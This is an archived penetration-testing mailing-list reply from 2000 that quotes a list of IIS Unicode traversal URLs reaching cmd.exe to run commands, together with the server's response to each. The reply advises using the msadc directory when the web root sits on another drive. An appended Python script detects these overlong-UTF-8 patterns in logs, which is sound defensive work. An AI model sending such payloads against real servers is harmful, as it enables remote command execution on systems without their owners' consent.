


Penetration Testing: Re: [PEN-TEST] IIS UNICODE Strings

Re: [PEN-TEST] IIS UNICODE Strings

From: Marco <m.v.berkum_at_obit.nl>
Date: Tue, 31 Oct 2000 10:33:16 +0100

Erick Arturo Perez Huemer wrote:

> Testing this list on a Spanish NT 4.0 Sp6 machine reveals:
>
> http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found (HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+d
> ir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+d
> ir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/
> c+dir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.ex
> e?/c+dir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd
> .exe?/c+dir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/
> cmd.exe?/c+dir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> In our test, the InetPub directory is in logical drive D: instead of default
> C:.
> Does that matter in the above examples?

Yes... you should use the msadc directory... it's located on systemdrive.
Check my advisory at http://ws.obit.nl/nt.txt
grtz,
Marco
Received on Nov 01 2000
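
For defenders reviewing web server logs for the request patterns quoted in this thread, the following is an added example and not part of the original post. It percent-decodes a request line and reports UTF-8 sequences that are not in shortest form, together with the code point a permissive decoder would produce. The function names and the sample log lines are constructed for illustration.

```python
import re

# (low lead byte, high lead byte, sequence length, payload mask of the lead byte)
_LEADS = [(0xC0, 0xDF, 2, 0x1F), (0xE0, 0xEF, 3, 0x0F), (0xF0, 0xF7, 4, 0x07),
          (0xF8, 0xFB, 5, 0x03), (0xFC, 0xFD, 6, 0x01)]
# Smallest code point that legitimately needs each length (shortest-form rule).
_MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}
SEPARATORS = {0x2E, 0x2F, 0x5C}  # '.', '/', '\'

def percent_decode(s):
    """Decode only well-formed %XX escapes; malformed ones (e.g. %pc) stay literal."""
    return re.sub(rb"%([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), s.encode("utf-8"))

def find_overlong(url):
    """Return [(hex_bytes, lax_code_point)] for non-shortest-form UTF-8 in url."""
    raw, hits, i = percent_decode(url), [], 0
    while i < len(raw):
        lead = next((l for l in _LEADS if l[0] <= raw[i] <= l[1]), None)
        if lead is None or i + lead[2] > len(raw):
            i += 1
            continue
        _, _, n, mask = lead
        cp = raw[i] & mask
        for b in raw[i + 1:i + n]:
            cp = (cp << 6) | (b & 0x3F)  # lax: the 10xxxxxx marker is not verified
        if cp < _MIN_CP[n]:              # value would have fit in a shorter form
            hits.append((raw[i:i + n].hex(), cp))
            i += n
        else:
            i += 1
    return hits

def triage(log_lines):
    """Keep lines where an overlong sequence lax-decodes to '.', '/' or '\\'."""
    scored = ((line, find_overlong(line)) for line in log_lines)
    return [(l, h) for l, h in scored if any(cp in SEPARATORS for _, cp in h)]

# Constructed sample log lines (request paths follow the forms quoted above).
SAMPLE_LOG = [
    r"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 403",
    r"GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 403",
    r"GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 500",
    r"GET /caf%c3%a9/menu.html 200",
]

if __name__ == "__main__":
    for line, hits in triage(SAMPLE_LOG):
        print(hits, line)
```

Legitimate multi-byte UTF-8 such as `%c3%a9` is not reported, because its value cannot be written in fewer bytes.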
